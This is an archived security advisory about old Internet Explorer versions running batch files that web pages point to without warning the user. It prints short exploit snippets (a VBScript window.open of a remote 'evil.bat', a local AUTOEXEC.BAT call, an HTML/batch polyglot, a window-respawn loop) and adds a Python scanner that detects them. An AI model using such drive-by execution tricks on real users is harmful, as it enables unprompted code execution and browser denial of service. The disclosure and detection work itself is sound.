COMMAND

    Internet Explorer

SYSTEMS AFFECTED

    Systems running IE (guess who)

PROBLEM

    The following  was posted  to BoS.   This HTML  script should make
    MSIE run any .bat file.  The script follows.

	http://foo.com/blah.bat

	-------------------------
	@echo "<html>" > nul
	@echo Insert Evil Command of the Week here!
	exit
	<meta http-equiv="refresh" content="0; url=w/blah.bat">
	@echo "</html>" > nul

    David Litchfield expanded on  that with the following  VBScript
    (tested with IE 3.02).  The problem is triggered by this VBScript:

<SCRIPT LANGUAGE="VBSCRIPT">
	WINDOW.OPEN("http://www.company.com/evil.bat")
</SCRIPT>

    This causes a new instance of  IE to open and the batch  file will
    be run.  What  is worrying is the  batch file does not  have to be
    stored locally.  It can be stored  on the Web server.  It is  then
    downloaded and run on the local  machine.  IE does not prompt  the
    user with any security warnings.  It just goes ahead and runs  the
    batch file..."evil" commands 'n' all.  This same VBScript can also
    be used to run  batch files that are  stored locally by using  the
    following:

	WINDOW.OPEN("FILE://C:/AUTOEXEC.BAT")

    Also, has anyone ever considered the  following VBScript  (call it
    wintest.htm):

	<BODY LANGUAGE="VBSCRIPT" ONUNLOAD="RELOAD">
	<SCRIPT LANGUAGE="VBSCRIPT">
	    WINDOW.OPEN "WINTEST.HTM", "WINDOW", "TOOLBAR=NO"
	    SUB RELOAD
	        WINDOW.OPEN("WINTEST.HTM")
	    END SUB
	</SCRIPT>
	</BODY>
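
    The  patterns above  (a script-driven  WINDOW.OPEN  pointing at  a
    batch file or a  FILE:// URL, a  meta refresh onto a  .bat, batch
    commands at the top of something served as HTML, and an  ONUNLOAD
    handler that  re-opens the  window) are easy  to spot  in  page
    content.  The Python  below is an  added example, not  code from
    the BoS posting or  from David Litchfield; the regexes,  the .cmd
    extension, the  example.invalid  hostname and  the sample  pages
    are assumptions modelled on the snippets above.  It is the  kind
    of check a proxy or  mail gateway of the time could have run  to
    flag such pages before a 3.x browser ever saw them.

```python
import re
from dataclasses import dataclass
from typing import List

# File types that IE 3.x handed straight to the shell instead of rendering.
# (.cmd is an assumption; the advisory names only BAT/EXE/COM.)
EXECUTABLE_EXTS = (".bat", ".com", ".exe", ".cmd")

# VBScript WINDOW.OPEN with a quoted first argument, with or without parentheses:
#   WINDOW.OPEN("http://.../evil.bat")   or   WINDOW.OPEN "WINTEST.HTM", "WINDOW"
WINDOW_OPEN_RE = re.compile(r'WINDOW\.OPEN\s*\(?\s*"([^"]*)"', re.IGNORECASE)
# <meta http-equiv="refresh" content="0; url=...">
META_REFRESH_RE = re.compile(
    r'<meta[^>]*http-equiv\s*=\s*"refresh"[^>]*content\s*=\s*"[^";]*;\s*url=([^"]*)"',
    re.IGNORECASE,
)
# Batch commands at the start of a line: the HTML/batch polyglot signature.
# Heuristic only; a prose line beginning with "echo" would also match.
BATCH_LINE_RE = re.compile(r"^\s*@?(echo|exit|cls|call)\b", re.IGNORECASE | re.MULTILINE)
# An ONUNLOAD handler: combined with WINDOW.OPEN it re-spawns the window on close.
ONUNLOAD_RE = re.compile(r"\bONUNLOAD\s*=", re.IGNORECASE)


@dataclass
class Finding:
    kind: str    # script-open | meta-refresh | batch-polyglot | unload-reopen
    target: str  # the URL or a short description of what matched


def is_risky_target(url: str) -> bool:
    """True when IE 3.x would execute the navigation target instead of rendering it."""
    u = url.strip().lower()
    if u.startswith("file:"):  # local files, e.g. FILE://C:/AUTOEXEC.BAT
        return True
    path = u.split("?", 1)[0].split("#", 1)[0]  # drop query string and fragment
    return path.endswith(EXECUTABLE_EXTS)


def scan_html(page: str) -> List[Finding]:
    """Return every advisory pattern found in one page of HTML, in a fixed order."""
    findings: List[Finding] = []
    opens = [m.group(1) for m in WINDOW_OPEN_RE.finditer(page)]
    for target in opens:
        if is_risky_target(target):
            findings.append(Finding("script-open", target))
    for m in META_REFRESH_RE.finditer(page):
        if is_risky_target(m.group(1)):
            findings.append(Finding("meta-refresh", m.group(1)))
    if BATCH_LINE_RE.search(page):
        findings.append(Finding("batch-polyglot", "batch commands at line start"))
    if opens and ONUNLOAD_RE.search(page):
        findings.append(Finding("unload-reopen", opens[0]))
    return findings


# Constructed sample pages modelled on the advisory's snippets (hostname is a placeholder).
SAMPLE_REMOTE_BAT = (
    '<SCRIPT LANGUAGE="VBSCRIPT">\n'
    '\tWINDOW.OPEN("http://example.invalid/evil.bat")\n'
    '</SCRIPT>\n'
)
SAMPLE_LOCAL_BAT = 'WINDOW.OPEN("FILE://C:/AUTOEXEC.BAT")\n'
SAMPLE_POLYGLOT = (
    '@echo "<html>" > nul\n'
    '@echo placeholder command\n'
    'exit\n'
    '<meta http-equiv="refresh" content="0; url=w/blah.bat">\n'
    '@echo "</html>" > nul\n'
)
SAMPLE_RELOAD_LOOP = (
    '<BODY LANGUAGE="VBSCRIPT" ONUNLOAD="RELOAD">\n'
    '<SCRIPT LANGUAGE="vbscript">\n'
    'WINDOW.OPEN "WINTEST.HTM", "WINDOW", "TOOLBAR=NO"\n'
    'SUB RELOAD\n'
    '    WINDOW.OPEN("WINTEST.HTM")\n'
    'END SUB\n'
    '</SCRIPT>\n'
)
SAMPLE_BENIGN = (
    '<html><body><a href="page.html">ok</a>\n'
    '<SCRIPT LANGUAGE="VBSCRIPT">WINDOW.OPEN("help.htm")</SCRIPT>\n'
    '</body></html>\n'
)

if __name__ == "__main__":
    for name, page in [("remote-bat", SAMPLE_REMOTE_BAT), ("local-bat", SAMPLE_LOCAL_BAT),
                       ("polyglot", SAMPLE_POLYGLOT), ("reload-loop", SAMPLE_RELOAD_LOOP),
                       ("benign", SAMPLE_BENIGN)]:
        print(name, [(f.kind, f.target) for f in scan_html(page)])
```

    The  benign page  also calls  WINDOW.OPEN, on  an .htm  file, and
    produces no finding; only  targets IE would have executed  rather
    than rendered are reported.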

SOLUTION

    I think IE  4.0 is smarter.   In normal installation  of IE4.x  it
    ASKS what you  want to do with  that BATCH file -  i.e. it never
    runs it without asking.   It is standard behaviour for  many, many
    files to  ask what  to do  with them  - and  BAT/EXE/COM are  such
    files.